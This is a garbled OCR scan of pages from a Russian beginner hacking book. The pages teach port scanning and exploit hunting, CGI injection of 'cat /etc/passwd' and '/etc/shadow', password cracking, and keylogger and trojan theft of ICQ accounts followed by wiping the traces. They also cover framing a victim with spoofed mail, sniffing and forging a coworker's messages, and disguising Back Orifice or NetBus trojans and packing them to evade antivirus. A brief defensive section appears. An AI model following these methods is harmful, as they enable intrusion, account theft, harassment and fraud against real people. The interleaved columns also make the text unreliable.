d (enter), 1 (enter)

41 42
Хакинг с самого начала Хакинг с самого начала

Я ввожу строку еще раз и забываю Способы проникновения в


указать 512 (в конце строки)… удаленную систему
И что??? 99% провайдеров вы так просто не
взломаете (сразу), поэтому забудьте (на
А вот что — команда dd начала время) про их взлом! Ведь там же не
копировать раздел (весь) hda в hdc! полные ламера сидят (хотя и такое
И летит полностью раздел hdc! бывает…
Я за долю секунды понял, что сделал А теперь непосредственно шаги (или
что
то не то… и нажал Ctrl+С, что действия) для взлома.
прервало выполнение программы dd. Но Вы должны просканировать
все мои усилия оказались напрасны… атакуемый хост (сервер) (пример с
команда dd уже скопировала около 20 Кб с использованием программы portscanner):
одного винта на другой…
#portscanner 55.55.55.55 1 1024
Винт пришлось переразбивать и где 55.55.55.55 — IP
адрес хоста; 1 — с
переформатировать… какого порта начинать;
В результате я потерял около 8 часов 1024 — каким закончить.
времени при переинсталляции всего что Далее (по истечении n
го времени)
было, неделю на скачивание всех нужных мы получаем ответ (по большей части
мне программ с Internet и около 2
х стандартный):
месяцев моих работ…
21
Отсюда вывод: никогда не 22
экспериментируйте с такого рода 25
программами как dd и fdisk. 80
А теперь, как говорится ближе к телу 110
(я имел ввиду делу). Теперь запускаем следующие
команды:

43 44
Хакинг с самого начала Хакинг с самого начала

#telnet HOST_IP 21 CGI программы выполняются на


#telnet HOST_IP 22 сервере, а данные выводят вам в виде html
#telnet HOST_IP 23 или других видов mime
types (например
#telnet HOST_IP 80 gif).
#telnet HOST_IP 110
Вы вероятно задавали себе вопрос —
Обязательно после выполнения как работают баннерные системы,
каждой команды и перед вводом счетчики страниц, чаты, доски
следующей — записываем версию, объявлений, различные формы и т.д.
название и релиз демона на порте. Безусловно, все они используют CGI…
Теперь — остается самое простое — Вот простой пример использования
найти exploit к этому демону… CGI, написанного на Perl:
Не работает? #!/usr/bin/perl
Вот возможные ошибки: print "Contenttype: text/html\n\n";
print "Hello!\n";
1. Вы ошиблись в версии; Эта простейшая из всех простейших
2. Вы ошиблись с IP
адресом; программ выведет (при ее запуске на
сервере) в вашем браузере строчку:
3. Хост, который вы атакуете, уже
пропатчен; Hello!
и перевод каретки.
4. Вы неправильно используете
exploit. А вот, простой пример текстового
счетчика (можете поставить его к себе на
Более простые методы взлома страничку). Условия, чтобы он работал:
Вот простой метод взлома (очень 1. Файлы
популярный среди новичков) — это взлом
через CGI. Что такое CGI? Это Common ■ Count.cgi — имя файла с
Gateway Interface. программой;

45 46
Хакинг с самого начала Хакинг с самого начала

■ Count.dat — имя файла с Файл count.dat должен содержать


данными о посещениях. всего одну строчку с количеством
посещений (например 5).
2. Права доступа: (предполагается,
что вы находитесь в директории с этими Вот и все! Теперь каждый раз, после
файлами): обращения к count.cgi количество
посещений будет расти на 1.
■ Count.cgi 755. Т.е.
#chmod count.cgi 755 Теперь вы знаете некоторые основы
CGI и готовы ко взлому через него…
■ Count.cgi 777. Т.е.
#chmod count.dat 777 Не пытайтесь взламывать
поисковики и подобные им системы (с
Если у вас нет telnet доступа к
хорошей посещаемостью) т.к. все они
серверу, а только ftp доступ, то найдите
очень хорошо пишут CGI скрипты!
программу ftp, которая поддерживает
Попробуйте найти какой
нибудь
функцию chmod или используйте
ламерский сайт (желательно зарубежный,
текстовую версию программы ftp.
т.к. их больше и по количеству, и по
Теперь содержимое программы ламерам в виде администраторов), так как
count.cgi: есть одно правило: «Сложность взлома
#!/usr/bin/perl прямо пропорциональна посещаемости
print "Contenttype: text/html\n\n"; сайта».
open (file,"count.dat); А теперь ко взлому… (Этот метод
@dat=<file>; работает не на всех системах, но в
close (file); некоторых все же пашет…)

$dat[0]++; Скрипт рассылки (записывает ваш e

open (file,">count.dat"); mail и высылает вам что


то). Вместо e
mail
print "$dat[0]\n"; пишем просто:
close (file); cat /etc/passwd
print "Всего посетителей $dat[0]\n";
47 48
Хакинг с самого начала Хакинг с самого начала

или мусора, можно вытянуть много полезной


cat /etc/master.passwd информации, например, — те же пороли
для входа в систему.
или
cat /etc/shadow Сброс на винт делается специально
для разработчиков данного демона, чтобы
Попробуйте все три строки (по
они (разработчики) могли просмотреть,
очереди). Если пишется ошибка, то
как он (демон) навернулся.
возможно, так их не суждено взломать.
Где этот Файл? Файл всегда
А если пишется что
то типа:
находится в каталоге с демоном и
Root:fdkjhgSFDgf:……… называется (обычно) «.core».
То вы набрели на файл паролей…
Как «оборвать» демон? Есть
Теперь вам необходимо его расшифровать
множество различных путей, например,
(например john the ripper’ом) и вы явным
послать недопустимый набор символов на
образом можете проникнуть в систему.
порт этого демона, что может привести к
Вывод: скрипты иногда позволяют
тому, что он «грохнется».
запускать на удаленной машине
программы. Многие наверно помнят пол
кбайта,
которые вешали любой
real
networks сервер (сервера для
Технология обрыва стэка проигрывания real
audio/real
video
Обрыв стека — это когда вы вешаете форматов). Кстати, это было не так
какой
нибудь демон, посылая давно…
недопустимый набор символов на его
порт. Охота за UIN’ом: Bugs, Crack и
Что при этом происходит? При Social Ingineering
аварийном выходе демона, он (демон)
сбрасывает память (ОЗУ) на винчестер. Итак я вышел на тропу войны: хочу
При этом из этого сброса, помимо всякого быть смелым и красивым, с шестизначным

49 50
Хакинг с самого начала Хакинг с самого начала

UIN номером и чтоб все поняли что секьюрити у пользователя тем быстрее
миллионные числа это не серьезно, вот получается полный доступ к его пассворду.
посмотрите на меня — я был одним из Иными словами, чем выше уровень
первых пользователей или неважно кем я защиты — тем больше вероятность, что
был, важнее кем я стал. А как я стал, жертва введет пассворд для того чтоб
сейчас расскажу. использовать ICQ. Ставится троян для
облегчения дальнейшего доступа и
На мой взгляд самый реальный и
перезагружается машина (перезагрузка
предельно простой способ: исследование
машины зависит от многочисленных
Internet Сервис Провайдера и соседских
факторов, от операционной системы до
сетей на предмет тех пользователей, кто
скорости подсоединения к сети). При
имеет открытые зашаренные диски и не
благоприятном стечении обстоятельств
защитили их пассвордом. Находятся такие
получение пассворда к выбранному UINу
люди программой «Легион». Из пяти сотен
займет десять, от силы двадцать, минут —
проверенных компьютеров более тридцати
ровно столько, сколько потребуется на
имело открытым диск C:\ с полным
reboot, дозвонку на провайдера, запуск
доступом. Все они являлись
ICQ и введение пассворда, далее берется
пользователями ICQ. Выбор UINов просто
лог созданный keyboard sniffer и читается
потрясающий — от 20xxxx до 80xxxxx.
пассворд. Все.
Смотрим C:\Program Files\ICQ\UIN и
видим number.uin — внутри этого файла Более того, возможность того что
всего лишь несколько строк с после всего этого останутся какие
либо
информацией о номере, имени, нике и e
логи или иные следы взлома ничтожно
mail адресе хозяина. Если номер мала: уничтожается лог, sniffer и троян.
устраивает, ставится keyboard sniffer
который запишет в лог все то, что Вы что, уже уходите? А что, у
пользователь введет в клавиатуры. вас еще что.то осталось?
ICQ имеет три уровня секьюрити — Начнем с того, что если вы
Low, Medium и High. Чем выше уровень зарегистрировали аккаунт и забыли к нему
пассворд, достаточно заявить свой UIN на
51 52
Хакинг с самого начала Хакинг с самого начала

http://www.icq.com/ Рассмотрим конкретный вариант:


password/ и в течении нескольких дней некто Вася Табуреткин зарегистрировал
служба технической поддержки ICQ себе ICQ аккаунт под номером 777777.
вышлет на указанный вами при Какой замечательный UIN! Смотрим
регистрации e
mail адрес забытый какой у Васи e
mail, видим
пассворд. vasya@something.com. По номеру UINа
можно сделать вывод, что он был
Теперь рассмотрим это с позиции
зарегистрирован более 2 лет назад. Если
хакера — для того чтобы получить
sometihg.com является публичным
пассворд к определенному UINу надо
бесплатным e
mail сервисом, вполне
лишь заявить о потери памяти и пойти
может обнаружиться что Вася этот аккаунт
проверить e
mail.
не пользовал и более такого адреса не
Как прочитать сообщение существует. Как результат происходит
адресованное не вам — это другая регистрация точно такого же аккаунта,
история. Например, существует POP3 заявляется о потери пассворда и
Password Crack — имя логина и домейн проверятся новый e
mail на предмет
нам уже известны. Главное — это пассворда от 777777.
предельно правильно идентифицировать
Существует другой, более сложный
систему и тип сервера, аккаунт на котором
вариант игры: лишение Васи обладания
необходимо проверить и искать
его e
mail адресом.
инструменты взлома этой конкретной
конфигурации. Например, недавно Есть конкретные правила поведения
разразился громкий скандал по поводу пользователей сервиса (например: email —
hotmail.com в связи с очередной нельзя спамить, web — нельзя
недоработкой славной фирмы Микрософт, порнографии), нарушая которые
дающей возможность миллионам людей пользователи как правило лишаются права
право читать e
mail друг друга, чего они на адрес или web
страницу. Кто мешает
совершенно делать не должны. хакеру написать несколько десятков тысяч
воззваний о легализации детской

53 54
Хакинг с самого начала Хакинг с самого начала

порнографии и проституции от имени как о большом достижении в борьбе с


vasya@something.com? Установите тип спамерами и рассадниками порнографии.
сервера, узнайте язык общения с ним Вы в тот же день зарегистрируете аккаунт
клиента и пошлите все эти воззвания на себя и заявите о потере пассворда. В
самому себе и своим друзьям (или на свои итоге у вас долгожданный UIN и твердая
другие e
mail аккаунты) указав обратным уверенность в том, что если вы имеете
адресом vasya@something.com. Далее вы и бесплатный e
mail — никто никогда у вас
ваши друзья должны будете переправить его не отнимет.
все «полученное» от Васи по адресу
администратора домена с нотой протеста Попытка — не пытка, как
против легализации и просьбой наказать говорил товарищ Берия
виновного. «Послания» Васи следует Поиграем с тем, что ICQ имеет
уничтожить и в завязавшейся переписке с лимит на длину пассворда 8 знаков. В
администрацией сообщить, что следов Windows среде поменять пассворд на свой
преступления осталось мало: вы все стерли UIN нельзя или достаточно сложно — для
так как были шокированы и праведный этого существует функция в клиенте. В
гнев обуял вас так сильно, что всем Linux, например, в большинстве случаев
подъездом вас держали. Попросите имеется файл, в котором существует графа
администратора обязательно держать вас в password, куда пользователь вписывает
курсе дела. Далее пошлите сообщение того свой пассворд (при возможности хака
же самого содержания, используя Васин юниксовой машины пассворд читается без
обратный адрес, вашим другим друзьям малейших затруднений, но как получить
или на ваши другие аккаунты и напишите доступ к домашней директории
администрации о этом безобразии в других пользователя или доступ root — это уже
словах. Создайте видимость, что этот Вася совершенно другой разговор).
шлет тысячами сообщения о нелегальных
вещах группе незнакомых между собой Теперь давайте попробуем прописать
людей… Прогнозирую до 80% успеха, у в Linux ICQ клиент
конфигурационный
Васи отнимут аккаунт, о чем вам заявят файл, тот самый желаемый вам UIN и

55 56
Хакинг с самого начала Хакинг с самого начала

пассворд из любого набора букв длинной в Кстати, использование сниффера


9, а может и больше знаков. Попробовали? вообще всегда является хорошей идеей
сбора информации.
При благоприятном стечении
обстоятельств вы сможете получать и Вопрос: меня зовут Петя Иванов, у
отправлять сообщения от лица выбранного меня в офисе на одной со мной сетке
вами UINa. Если ваш Linux ICQ клиент сидит Маша Пилюлькина и она страшная
поддерживает любую длину пассворда и стерва. Что я могу сделать с ней и ее ICQ?
возможность его смены на сервере — вы
Ответ: испортить ей жизнь. Если вы
берете тот аккаунт, который вам нравится.
находитесь на одном и том же фрагменте
Данный баг работал достаточно сети, у вас все карты в руках, «ICQsniff»
долго и надеюсь создатели ICQ защитили отдаст вам Машин пассворд, да и впрочем
своих клиентов, но кто знает… пассворды всех других пользователей ICQ
в вашей конторе. Более того, существуют
«Она же… Валентина Понеяд… методы перехвата сообщений от одного
Она же…» пользователя другому и коррекция их,
Вопрос: Может ли кто
либо например, вы можете следить за
изменить пассворд моего ICQ аккаунта без перепиской Маши и вашего босса. Как
получения доступа на мой компьютер и e
только вам в этой переписке что
то не
mail? понравится, можете сообщить боссу от
лица Маши все, что вы думаете о предмете
Ответ: Да, отвечу я и посоветую обсуждения и заявить, что он как
искать инструмент взлома ICQ под начальник некомпетентен в этом вопросе,
названием «ICQhijeck». При наличии IP а вот, например, Петя Иванов гораздо
жертвы, его UINa и номера порта для умнее и так далее, так что давайте Пете
связи с клиентом ICQhijeck пошлет Мерседес купим.
spoofed пакет, заявляющий о себе, что
пакет принадлежит самому клиенту и Вопрос: а где мне взять ICQhijeck,
несет в себе задачу смены пассворда. ICQsniff, keyboard sniffer, трояна и
Пассворд выбирает нападающий. TCP/UDP sniffer и есть ли что
либо еще

57 58
Хакинг с самого начала Хакинг с самого начала

такое интересное, где можно нажать Помните, что существует


кнопочку и все
все хакнуть? вероятность, что кто
то может читать
ваши сообщения и то, что ICQ не
Ответ: Существует такое понятие как
является стандартом секретных
«Private Bug», нечто обнаруженное лишь
коммуникаций.
вами и никому еще не известное. Вполне
возможно, что люди, посвятившие много Имеются десятки программ,
время изучению методам работы ICQ, способных вызвать сбой в работе вашего
имеют очень мощные инструменты по ICQ клиента, особенно если он работает в
работе с ним. среде Windows. Следите за новостями,
публикуемыми на www.icq.com и
Но достанутся ли эти tools вам? Все
используйте всегда последнюю версию
зависит от вас, от вашего терпения,
ICQ, даже если старая имеет свои
трудолюбия и любознательности. Не
достоинства в виде безлимитного размера
забудьте прибавить коммуникабельность и
посылаемого сообщения. Вполне
умение задать интересный вопрос
возможно, что вы заплатите слишком
знающему предмет обсуждения человеку.
дорогую цену за эту возможность.
Вполне возможно вы все узнаете.
Имейте антивирусные программы и
Если у вас нет друзей, способных
используйте их. Так же за ними
рассказать вам то, что вы хотите знать,
необходимо следить — брать новые
советую использовать большие поисковые
библиотеки для обнаружения вирусов и
системы типа www.yahoo.com. Не забудьте
троянов с web
сайта производителя
указать предмет поиска.
программы.
Выйду на улицу, гляну на Не доверяйте безгранично
село… публичным сервисам типа free emeil, free
Время рассмотреть методы защиты и webhosting и так далее. Ничего
что вы должны помнить, если дорожите удивительного в том, что кто
то
своим UINом и информацией, уничтожил все ваши файлы на страничке
передаваемой при помощи ICQ. или прочел ваш e
mail, я не вижу. Вполне

59 60
Хакинг с самого начала Хакинг с самого начала

житейское дело, и, пожалуйста, не имейте Взлом компьютера через


публичного
e
mail адресом для контакта технического Internet
обслуживания ICQ с вами в случае потери Как вы догадываетесь процесс
пассворда. взламывания по сети удаленных
Будьте готовы к тому, что в один компьютеров довольно долгое и
прекрасный день вы обнаружите, что ваш утомительное занятие…Но результат ваших
пассворд изменен и аккаунт вам не действий может быть очень приятным для
принадлежит. Обратитесь за помощью в вас.
технический суппорт. Если вы думаете, что я вам здесь
Ну и конечно следите за своим буду рассказывать о детских шалостях типа
компьютером при использовании Internet Nuke или атаки на порт 139, то вы сразу
— есть большой выбор программ, можете пойти посмотреть сервер
показывающих вам кто, зачем, почему и http://www.microsoft.com — там вам
когда пытался проникнуть на ваш веселей будет.
компьютер. Если вы хотите чтобы ваше
Иногда я сам лично думаю, что пребывание на любых серверах в Internet
вполне возможно что создатели ICQ в было менее заметным, а в некоторых
данный момент насчитывают несколько случаях практически невидимым, то всегда
миллионов компьютеров в своей базе пользуйтесь Proxy сервером, например,
данных, к которым они имеют полный через прокси сервер http://www.gin.ru. Это
доступ. Кто знает, может быть ICQ — это первый момент…
хорошо распространенный троян? Второй момент — установите себе
Сложное чувство, признаюсь вам… программу:
http://www.teamcti.com/pview/PrcView.zip,
при помощи которой вы сможете легко
обнаружить, какие страшные программы
запущены на вашем компьютере…
61 62
Хакинг с самого начала Хакинг с самого начала

Момент номер три: периодически управления) или доступ ко всем ресурсам


заглядывайте в раздел RUN системного компьютера вам нужно знать следующее:
реестра вашего Windows 95/98… Это
1. Вам очень легко стать Хакером
можно сделать следующим образом:
если вы знаете какой
нибудь
запустите программу regedit — эта
профессиональный язык
программа есть в каждой версии Windows
программирования, например, C++, или
(For Lamers). Далее заходите в раздел
Visual C++, или Delphi, или еще какой

HKEY_LOCAL_MACHINE\Software\Micro
нибудь, поддерживающий 16 и 32
х
soft\Windows\CurrentVersion\Run. Там
битные современные приложения
смотрите, не грузятся ли вместе с вашим
(наиболее часто встречаются в сети
виндовсом программы
паразиты, которые
Windows95/98)
могут являться причиной утечки
информации через Internet или локальную 2. Вы не знаете никакого языка, но
сеть! Если вы плохо понимаете, о чем я вы очень хотите стать Хакером. Самый
говорю — то читайте следующие пункты и многочисленный вид людей, населяющих
вам все станет ясно! сеть. Итак, приступим ко взлому, господа.

Виды взломов Порядок действий для 1


Существует куча просто различных группы
разновидностей взломов, начиная от Вы знаете язык!!! Это круто!!! Вы
примитивного локального sharin’га и хорошо его знаете? Если плохо, то идите
кончая взломом серверов со сложной ssl учите, или читайте порядок действий 2
защитой, взломов cgi
скриптов… Я же группы, или идите смотрите
буду рассказывать о наиболее http://www.microsoft.com.
распространенном виде взлома — это
Если хорошо — то:
программный взлом, что это такое — вы
сейчас узнаете. 1. Вам необходимо написать 16
32
битное приложеньице типа:
Для взлома чужого (удаленного)
компьютера (получение полного
63 64
Хакинг с самого начала Хакинг с самого начала

Client <> Server 2. Все протестировано и готово к


Причем придется писать две работе. Как впарить «Сервер» UL’у? Да
программы (читай дальше). проще пареной репы… Например,
приклеить это к
Особенности серверской части какой
нибудь нужной программке и
программы: послать ее (например, на сервер с
■ Сервер должен грузиться программами общего пользования) для
вместе с виндовсом склейки программ (причем запускается
первой ваша, а потом приклеенная).
■ Должен быть невидим при
Используйте специального клиента, о
нажатии Ctrl+Alt+Del
котором я расскажу позже. Или пошлите
■ Невидим вообще на экране «другу» новый чат.
виндовса
Порядок действий 2 группы:
■ Выполнять следующие
1. Да… Дело худо… Но не все
действия: передавать невидимо
потеряно…Ура, радуйся! Существует куча
на Клиента (по запросу
уже сделанных программ типа
клиентской части, проще всего
это сделать, используя в Client <> Server
программе собственные которыми сеть запруднена до предела.
команды типа Единственное, что нужно, так это
GetFolderTreeDrive или разобраться в работе программы, что
GetScreenShot — если вы поверьте мне легче изучения языка. Итак,
грамотный программер — то наиболее распространенная программа —
вы меня поймете) и так далее это BO или Back Orifice, что в дословном
и сколько вам нужно и чего переводе обозначает: Администрирование
нужно получить от удаленного Через Задний Проход. Или программа
компьютера, столько и NetBus или NetBus Pro, которую можно
делайте. найти практически в любом поисковом
сервере. Короче, таких программ море…

65 66
Хакинг с самого начала Хакинг с самого начала

Ищите и найдете. Единственным минусом машине, которую нужно взломать. После


этих программ является одно — они очень запуска программа автоматически
быстро попадают в определение прописывается в автозагрузку Windows и
Антивирусов и лечатся антивирусами. Но «не видна» без вооруженного глаза. Но
и это — не проблема. Потому как стоит просмотреть список текущих
существует куча программ, которые процессов (например, с помощью
специальным образом программы PrcView) и мы сразу увидим
сжимают — кодируют текст программы и непонятный файл типа .exe. Это и есть
антивирус уже бессилен!!! Для примера «сервер» Bo. Так же он создает библиотеку
можно привести программу NeoLite, в Windows\system\windll.dll, при удалении
расположенную по адресу: которой компьютер можно считать
http://www.neoworx.com. Подробно об этих очищенным от Bo.
программах вы узнаете прочитав все до
BoGui.exe
конца.
Этот файл является «клиентом» и
2. Все, у вас есть одна из таких находится у Хакера. При помощи этой
программ, вы сами разобрались, как она программы можно управлять удаленным
работает!!! Это тоже подвиг! Теперь компьютером.
читайте пункт 2 для группы людей №1!
BoConfig.exe
Описание программы Back Является файлом, при помощи
Orifice которого файл BoServ.exe можно склеить с
Пакет программы BO состоит из 4 любой программой. Плюс ко всему можно
файлов и больше. Мы не будем установить порт сервера, пароль сервера,
рассматривать плугины, а рассмотрим название и т.д.
основные 4 компонента.Итак: BoClient.exe
BoServ.exe Это приложение является такой же
Этот файл является «сервером». Он частью, как и BoGui.exe, но без
как раз и отсылается в чистом виде к

67 68
Хакинг с самого начала Хакинг с самого начала

аппликации и управление сервером File find


происходит в командном режиме… Найти файл
Target host:port File view
Имя хоста, на котором запущен Показать файл
сервер BO. Порт, по умолчанию, 31337.
HTTP enable
Команды управления: Включить HTTP сервер на
Directory creat определенный порт
Создание директорий (каталогов). HTTP disable
Directory list Выключить HTTP сервер на
определенный порт
Просмотр директорий
Key log begin
Directory remove
Включить запись нажатия на
Удаление директорий
клавиши
Export add
Key log end
Добавление sharing
Выключить запись нажатия на
Export delete клавиши
Удаление sharing
MM capture avi
Export list Записать видео .avi файл
Список всех sharing
MM capture frame
File copy Скопировать frame
Копировать файл
MM capture screen
File delete Снять Screen Shot c экрана монитора
Удалить файл

69 70
Хакинг с самого начала Хакинг с самого начала

MM list capture device Команды Reg


Список доступных видео ресурсов Группа команд позволяющих
полностью управлять реестром
MM play sound
Проиграть музыку Windows System dialog box
Вывести всплывающее окно
Net connections
Сетевые подключения System info
Информация о системе
Net delete
Удаление подключений System lockup
Вырубить компьютер из сети
Net use
Использования подключений System passwords
Вывести все пассворды и логины
Net view
Просмотр подключений System reboot
Перезагрузить компьютер.
Ping host
Есть ли сервер Bo на этом хосте Это список наиболее
распространенных команд!
Process kill
Убить какую
нибудь запущенную Описание программы NetBus
программу Пакет программы Net Bus состоит из
2 файлов.
Process list
Список запущенных программ patch.exe
Сервер. Сервер довольно удобный,
Process spawn
т.е. запустил и никаких настроек, все
Запустить программу выполняет клиент.

71 72
Хакинг с самого начала Хакинг с самого начала

Netbus.exe Screendump
Клиент. Снять Screen Shot с экрана монитора
Описание команд Net Bus: Get info
Host name/IP Информация о компьютере
Хост на котором запущен сервер Play sound
Port Проиграть музыку
Порт сервера, по умолчанию 12345 Exit Windows
Serevr admin Различные способы перезагрузки
компьютера
Различные настройки управления
удаленным компьютером. Пассворд, порт Send text
и т.д. Послать текст
Open CD.ROM Active winds
Открыть CD
ROM Запущенные программы и действия с
Show image ними
Показать картинку Mouse pos
Swap mouse Координаты мышки
Поменять кнопки мыши Listen
Start program Просмотр нажатия на клавиши On

Line, всякие комбинации типа Ctrl+Esc,


Запустить программу
Alt+ Tab и т.д.
Msg manager
Sound system
Куча действий с сообщениями
Управление Саунд
системой

73 74
Хакинг с самого начала Хакинг с самого начала

Server setup Защита от Back Orifice


Управление самим сервером Программа Back Orifice Eliminator
patch.exe позволяет узнать, запущен ли у вас на
компьютере сервер BO!!! А так же она
Control mouse
позволяет показать
Управлять мышкой
IP
адреса тех, кто заслал вам BO Server,
Go to URL проследить за ними и…
Послать на URL
Защита от Net Bus
Key manager Программа Net Buster позволяет
Действия с клавиатурой узнать, запущен ли у вас на компьютере
сервер Net Bus!!! А так же она позволяет
File manager
показать IP
адреса тех, кто заслал вам
Действия с файлами (очень развитая patch.exe (который, кстати, можно
система) переименовать в любое название),
Если сравнивать эти две программы, проследить за ними и… И даже в ответную
то Net Bus является более простой и им
рассчитана на Users & Lamers. Просто что
нибудь сотворить с компьютером или
запустить patch.exe и управлять удаленным на худой конец форматнуть им диск c:\.
компьютером. А Back Orifice требует Хотя есть 1000 способов отомстить и
настроек и более многофункциональна. покруче.
Логичней использовать эти программы
вместе. А лучше учить язык и писать свои. Как узнать IP по ICQ?
В Internet таких программ просто море… Элементарно… Воспользуйтесь
Так что проверяйте свой компьютер после программой icqs.exe. Она обычно бывает в
каждой запущенной программы… виде icqs.rar.

75 76
Хакинг с самого начала Хакинг с самого начала

Как выследить и наказать Далее вы просто звоните этому


Хакера физически? провайдеру и в наглую стучите на этого
Если тот человек, которого вы человека, говорите его IP, в какое время
хотели наказать программно, оказался он безобразил, что делал и т.д. Провайдер
продвинутым Хакером, не поддается ни на обязан (учитывая УК РФ по статье
какие уловки с вашей стороны, ничего не «Информационная безопасность»)
запускает, все проверяет, анализирует и, проследить за этим человеком и если
наконец, просто предельно осторожен и действительно его действия будут
бдителен — то остается одно средство — признаны как неправомерные — то он
наказать его физически, разумеется, не лишится в лучшем случае провайдера
зная его адреса — это невозможно, но есть (возможно даже с оповещением других
один способ. провайдеров), а в худшем — вообще
Internet на всю жизнь и мало того, можно
Вам необходимо узнать его IP
адрес подать на этого человека в суд. Ну это все
в Internet — это легче пареной репы. К лирика и действовать нужно так только в
примеру, вы знаете его уникальный самых крайних случаях. А настоящий
псевдоним или ник, вы ищете все по Хакер очень круто шифруется, использует
этому нику на http://www.yandex.ru, т.е. краденый Internet и нет никакой
всю возможную информацию про него, уверенности, что вы выйдете именно на
места, где он что
либо делал или того человека, на которого хотите…
подписывался своим e
mail или ником
(это могут быть различные Guest Book`s,
чаты, которые записывают IP Уроки сетевого хакинга для
посетителей). После того, как вы узнаете начинающих
его IP, вам необходимо узнать, кто его
провайдер, телефон, адрес, страну, все это Сетевые хаки это круто и просто.
можно сделать при помощи строчки, в Однако, как именно, и что именно нужно
которой вы введете его делать знают еще далеко не все. В народе
IP
адрес, и вы получите все… очень

77 78
Хакинг с самого начала Хакинг с самого начала

популярны exploit, то есть, готовые Как утащить etc/passwd


инструментарии для взлома, написанные В конференциях RU.HACKER и
другими хакерами. RU.NETHACK периодически вспыхивают
Но, во
первых, это не интересно и дискуссии: как утащить из
под лап
ставит в зависимость от тех, других администратора знаменитый файл
хакеров (дадут ли они нам или опять etc/passwd? А после того, как утащили —
зажмут все самое ценное?), а во
вторых, что с ним можно делать?
они очень быстро перестают работать — Сказывают, что якобы там хранится
дырки
то затыкаются, а свежих exploit раз несметное количество паролей, логинов,
два и обчелся, да и те устаревают не по аккаунтов, словом всего, что только
дням, а по часам. Пусть среди админов пасется на этом сервере. Другие же
много лохов, но и они начинают чесаться, утверждают, что нет там ничего, а если что
когда их взломают раз — другой кряду. и есть, так оно зашифровано и никакой
Поэтому единственная возможность жизни не хватит, чтобы вернуть его в
учится ломать самим. Самим искать дыры читабельное состояние.
и писать простейший инструментарий для Кто же из них прав? Тем более, что
взлома. Однако, как бы это ни было некоторые уже не раз оглашали мир
просто, но все же требует определенной радостным мявом, что, дескать, пароли
усидчивости и умственных усилий. они утащили и сейчас будут сидеть их
Зато потом можно не просто считать расшифровывать. Конечно же, ни с кем
себя хакером, но и быть им! Стоит ли другим они делиться своим богатством не
одно другого? Несомненно! Тогда — в собираются! Ну и не надо! Мы и сами с
путь. Путь долгий и тернистый. Ведь в усами! Вот как пойдем по ссылке
двух словах, как это ломают, не http://kpnc.webprovider.com/hack.pl, да и
расскажешь. Так что запасайтесь пивом и посмотрим etc/passwd одного далекого
быстренько подключайтесь к Internet заокеанского провайдера, да еще в
(начальный доступ у вас все же должен читабельном виде.
быть). Сейчас начнется самое интересное!

79 80
Хакинг с самого начала Хакинг с самого начала

Вот, что мы увидим на экране! (Тут demo Demo User


надобно заметить, что если стоит Netscape, /usr/demo
то ничегошеньки видно не будет; а если mail Sendmail
мы установили IE 4.0 (5.0) и все равно /var/spool/mail
ничего не видно, — так это просто надо brian Brian Atkins,,,
подождать, — файл etc/passwd очень /export/home/brian
длинный, и если канал у вас не шибко kannada Narendra Tumkur
быстрый, то перекачка может занять, /disk1/k/kannada
возможно, очень долгое время, — ждите pumpkin2 liao xin
тогда). /disk1/p/pumpkin2
lost508 no idea
Наконец на экране появится
/disk1/l/lost508
следующее:
essepi Salvatore Calarco
DISPLAY ETC/PASSWORD FILE… /disk1/e/essepi
LOGIN NAME DIR rajatbhasin Rajat Bhasin
root System Administrator /root /disk1/r/rajatbhasin
toor System Administrator /root panze Congo Koa
daemon System Daemon / /disk1/p/panze
sys Operating System /tmp goni1 Naseer Bhatti
bin BSDI Software /disk1/g/goni1
/usr/bsdi madmama patty noland
operator System Operator /disk1/m/madmama
/usr/opr yccwp yang changchun
uucp UNIXtoUNIX Copy /disk1/y/yccwp
/var/spool/uucppublic Это только малая часть от всей
games Games Pseudouser таблицы. Правда, паролей там нет. То есть
/usr/games они не показаны в явном виде —
news USENET News,,, законодательство надо же соблюдать хотя
/var/news/etc бы формально.

81 82
Хакинг с самого начала Хакинг с самого начала

Как их получить, об этом будет потом вы станете настоящим хакером


рассказано ниже. (шутка, однако)!
А пока можно, изучив список Итак, начнем разбираться, с
логинов юзеров, попробовать угадать, кто премудростями автора. Для начала
же из них окажется таким лохом, что заглянем внутрь файла nethackk1.htm (для
выберет короткий пароль, или, что еще этого в меню «Вид» браузера выберем
лучше, пароль совпадающий с логином. «Просмотр в виде HTML») — нам
Уверяю вас, таких лохов значительно представится следующие:
больше одного, так что на всех хватит, не
говоря уже о такой халяве как:
LOGIN NAME DIR
demo Demo User /usr/demo
На этом наш первый маленький
взлом можно считать завершенным.
Теперь разберемся, что же в
действительности произошло и можно ли
так ломать других провайдеров или нет?

Что это было?


Так что же произошло на самом
деле? Хитрый автор только дал кликнуть
по ссылке, а все остальное сделал сам. Это
конечно хорошо, но будет лучше, если не
только дать рыбу, но еще и научить ее
ловить! <CENTER><B>Ты хочешь посмотреть
etc/pasw одного провайдера?<BR>
Рыбу ловить изволите? В самом
деле? Тогда приготовьтесь, что это будет
долгий и муторный процесс, но зато

83 84
Хакинг с самого начала Хакинг с самого начала

Тогда <a Name Last modified Size


href="http://kpnc.webprovider.com/hack Description
.pl">ЖМИ</a> [DIR] Parent Directory 09Oct1999
Не нужно быть посвященным в 11:10  
тонкости программирования HTML, что [DIR] _private/ 09Oct1999 11:30 
бы понять, что выделенная 
подчеркиванием строка — перенаправила [TXT] form.html 09Oct1999 12:26 1k
нас на другой сервер и попыталась 
открыть, хм, какой
то «hack.pl». [DIR] images/ 09Oct1999 11:30  
[TXT] irc.html 09Oct1999 12:21 0k
Странно? А почему не html? Ну что 
же, попробуем открыть hack.pl [TXT] mamairc.html 09Oct1999 12:18
самостоятельно. Наберем эту строчку в 4k 
окне браузера, — как вновь выскочит [TXT] postinfo.html 09Oct1999 11:30
табличка с паролями. Быть может это 2k 
hack.pl и есть? И автор нас просто [TXT] thank_you.html 09Oct1999
разыграл, — смастерил фэйк, то есть 12:26 1k 
составил эту таблицу от балды?
Эге! Да тут директория _private. А
Но нетрудно убедиться, что таблица ну, пустят нас в нее или нет? Кликнем
эта живет своей «жизнью» — уходят одни мышом и с замиранием сердца ждем. Вот
пользователи — добавляются новые и черт, не пускают!
самое главное, что все логины
А узнать, что там, ой как хочется! Ну
правильные! Возьмем один, выбранный
что же, попробуем атаковать «в лоб».
наугад. Вот, например, madmama. Что
Вводим пароль «madmama» и с
скрывается за ним?
нетерпением ждем… Держите нас, это
Набираем в строке браузера сработало!!!
«madmama.webprovider.com» и что мы
Ну и что же в приватах? Гм, одна
видим?
большая dbf с названием prices. А, прайс
Index of /
85 86
Хакинг с самого начала Хакинг с самого начала

— по
